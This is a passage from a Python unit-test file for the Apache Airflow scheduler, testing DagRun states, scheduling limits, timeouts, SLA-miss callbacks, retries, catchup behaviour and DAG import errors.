processor.harvest_simple_dags.return_value = [dag]
processor.done = True
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, expected_task_state)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGs.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite having an unfinished task.
with create_session() as session:
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGs have run
"""
with create_session() as session:
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > datetime.datetime.utcnow())
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# zero tasks ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
session.commit()
# Previously, running this backfill would kick off the scheduler
# because it would take the most recent run and start from there.
# That behavior still exists, but now it will only do so if the run
# is after the start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# still one task
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
def test_scheduler_task_start_date(self):
"""
Test that the scheduler respects task start dates that are different
from DAG start dates
"""
dag_id = 'test_task_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=2)
scheduler.run()
session = settings.Session()
tiq = session.query(TI).filter(TI.dag_id == dag_id)
ti1s = tiq.filter(TI.task_id == 'dummy1').all()
ti2s = tiq.filter(TI.task_id == 'dummy2').all()
self.assertEqual(len(ti1s), 0)
self.assertEqual(len(ti2s), 2)
for t in ti2s:
self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
@parameterized.expand([
[State.NONE, None, None],
[State.UP_FOR_RETRY, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
[State.UP_FOR_RESCHEDULE, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
])
def test_scheduler_process_task_instances(self, state, start_date, end_date):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
with create_session() as session:
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = state
ti.start_date = start_date
ti.end_date = end_date
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_without_tasks(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_without_tasks',
start_date=DEFAULT_DATE)
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
scheduler = SchedulerJob()
dag.clear(session=session)
dag.start_date = None
dr = scheduler.create_dag_run(dag, session=session)
self.assertIsNone(dr)
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 1)
DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test that a dagrun will not be scheduled if max_active_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test that a dagrun will be set to failed if it times out
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEqual(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test that a dagrun will not be scheduled if max_active_runs
has been reached and dagrun_timeout has not been reached.
Test that a dagrun will be scheduled if max_active_runs has
been reached but dagrun_timeout has also been reached.
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as the DagRun has not timed out and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEqual(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
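# The pool has a single slot, so only one of the two SCHEDULED tis should reach the executor queue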
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEqual(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test that the schedule_interval is auto-aligned with the start_date:
if the start_date coincides with the schedule, the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
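# The start_date does not fall on the '4 5 * * *' schedule, so the first run is aligned to the next 05:04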
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
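# The start_date coincides with the '10 10 * * *' schedule, so the first execution_date equals the start_date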
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use an empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEqual(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create a dag with a start date of 2 days ago and an SLA of 1 day, so
# the SLA was already missed and an sla_miss is on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss for this task so manage_slas has something to act on
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_called()
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Make the mocked send_email raise so we can verify the exception is handled and logged
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='[email protected]',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss for this task so manage_slas has something to act on
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use an empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
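# Pull the single queued task out of the executor and rebuild a full
# TaskInstance from its SimpleTaskInstance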
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, simple_ti) = ti_tuple
ti = simple_ti.construct_task_instance()
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
# We do not assert ti.state == State.SCHEDULED here, because the
# scheduler will move the state from SCHEDULED to QUEUED.
# Now that the executor queue has been cleared the task can be
# re-queued, but tasks that stay in executor.queued_tasks after
# executor.heartbeat() will be set back to the SCHEDULED state
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# To verify that task does get re-queued.
executor.queued_tasks.clear()
executor.do_update = True
do_schedule()
ti.refresh_from_db()
self.assertIn(ti.state, [State.RUNNING, State.SUCCESS])
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id == dag.dag_id,
TI.task_id == dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_dag_with_system_exit(self):
"""
Test that a DAG which calls sys.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=dag_directory,
num_runs=1)
scheduler.run()
with create_session() as session:
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = \
(now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except Exception:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def setup_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': start_date
}
dag = DAG(dag_id,
schedule_interval=schedule_interval,
max_active_runs=1,
catchup=catchup,
default_args=default_args)
t1 = DummyOperator(task_id='t1', dag=dag)
t2 = DummyOperator(task_id='t2', dag=dag)
t2.set_upstream(t1)
t3 = DummyOperator(task_id='t3', dag=dag)
t3.set_upstream(t2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
scheduler = SchedulerJob()
dag1 = setup_dag(dag_id='dag_with_catchup',
schedule_interval='* * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=True)
default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
self.assertEqual(default_catchup, True)
self.assertEqual(dag1.catchup, True)
dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last half an hour, not 6 hours ago
self.assertGreater(dr.execution_date, half_an_hour_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag4 = setup_dag(dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag4)
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
